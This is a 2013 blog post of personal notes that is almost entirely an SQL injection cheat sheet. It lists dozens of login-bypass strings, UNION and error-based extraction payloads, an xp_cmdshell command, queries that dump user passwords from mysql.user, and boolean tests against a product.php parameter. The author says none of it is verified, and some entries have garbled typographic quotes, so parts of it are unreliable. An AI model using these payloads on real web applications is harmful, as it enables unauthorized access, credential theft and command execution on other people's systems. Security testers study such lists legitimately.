Monday, 4 November 2013

Notes on SQLI

Prerequisites: 
SQL server
I'm doing a little digging further into SQLI & while I'm by no means a DBA or even all that familiar with SQL it seems everyone has a cheat sheet now days & felt the need to have a location for posting a few of my notes. I have not verified any of this info at this time & will be doing that later. For now, I have merely collected some data to look into and am posting it here, feel free to comment or correct anything that anyone feels or knows is incorrect. If I ever referenced your material somewhere & did not give you credit please contact myself or someone in Soldierx & we will make sure you are added to the references list.
If anyone is looking for an actual tutorial, which this is not, at least not yet. I would refer you to Nu11By73's tutorial here:
https://www.soldierx.com/tutorials/Basic-SQLi-System-Level-Access
SQLI Authentication Bypass Cheat Sheet.
' /*!50000or*/1='1
' /*!or*/1='1
' OR username IS NOT NULL OR username = '
' or 1=1 union select 1,2 as `
' or 1=1#
' or 1=1--
' or 1=1/*
' or 1=1;
' or#newline
' or– -newline
') or '1'='1--
') or ('1'='1--
) or (’1'=’1–
) or ’1'=’1–
1 AND 1=1
1 AND ASCII(LOWER(SUBSTRING((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 116
1 AND USER_NAME() = 'dbo'
1 EXEC SP_ (or EXEC XP_)
1 OR 1=1
1 UNI/**/ON SELECT ALL FROM WHERE
1 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype = 'U' --
1' AND 1=(SELECT COUNT(*) FROM tablenames); --
1' AND non_existant_table = '1
1' OR '1'='1
1') and ’1'=’1–
1'1
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
1='1
1\'1
==
\'; DESC users; --
admin" #
admin" --
admin" or "1"="1
admin" or "1"="1"#
admin" or "1"="1"--
admin" or "1"="1"/*
admin" or 1=1
admin" or 1=1#
admin" or 1=1--
admin" or 1=1/*
admin") or "1"="1
admin") or "1"="1"#
admin") or "1"="1"--
admin") or "1"="1"/*
admin") or ("1"="1
admin") or ("1"="1"#
admin") or ("1"="1"--
admin") or ("1"="1"/*
admin"/*
admin"or 1=1 or ""="
admin' #
admin' --
admin' or '1'='1
admin' or '1'='1'#
admin' or '1'='1'--
admin' or '1'='1'/*
admin' or 1=1
admin' or 1=1#
admin' or 1=1--
admin' or 1=1/*
admin') or '1'='1
admin') or '1'='1'#
admin') or '1'='1'--
admin') or '1'='1'/*
admin') or ('1'='1
admin') or ('1'='1'#
admin') or ('1'='1'--
admin') or ('1'='1'/*
admin'/*
admin'or 1=1 or ''='
admin’ #
admin’ –
admin’/*
and 1=1
and 1=1–
hi’ or 1=1 –
hi” or 1=1 –
hi” or “a”=”a
or 0=0 #
or 0=0 –
or 1=1
or 1=1#
or 1=1--
or 1=1/*
or 1=1–
‘ and ‘one’='one
‘ and ‘one’='one–
‘ or 0=0 #
‘ or 0=0 –
‘ or 1=1/* (MySQL < 5.1)
‘ or 1=1–
‘ or 1=1– -
‘ or a=a–
‘ or ‘one’='one
‘ or ‘one’='one–
‘ or ‘x’='x
‘ or ’1'=’1
‘&&1=’1
‘) or (‘a’='a
‘) or (‘x’='x
‘-’
‘=’
‘or’1=1'
‘or’1=1'
‘||1=’1
“) or (“a”=”a
” or 0=0 #
” or 0=0 –
” or 1=1–
” or “a”=”a
” or “x”=”x
Other notes to look into:
exec master..xp_cmdshell 'dir'
from mysql.user where user
SELECT user, password FROM mysql.user
SELECT user, password FROM mysql.user LIMIT 1,1
SELECT password FROM mysql.user WHERE user = 'root'
SELECT * FROM 'user' WHERE 1 LIMIT 0,30
SELECT * FROM mysql.user WHERE 1 LIMIT 1,1
SELECT * FROM mysql.user
NUL (0x00) --> \0 [This is a zero, not the letter O]
BS (0x08) --> \b
TAB (0x09) --> \t
LF (0x0a) --> \n
CR (0x0d) --> \r
SUB (0x1a) --> \Z
" (0x22) --> \"
% (0x25) --> \%
' (0x27) --> \'
\ (0x5c) --> \\
_ (0x5f) --> \_
Error Based SQLi For integer inputs:
(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
For string inputs:
'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(@@VERSION),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'
The attacks above should throw 'duplicate entry' errors.
Clear SQLi Tests These tests are simply good for boolean sql injection and silent attacks.
product.php?id=4
product.php?id=5-1
product.php?id=4 OR 1=1
product.php?id=-1 OR 17-7=10
Reference: 
Posted by at
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)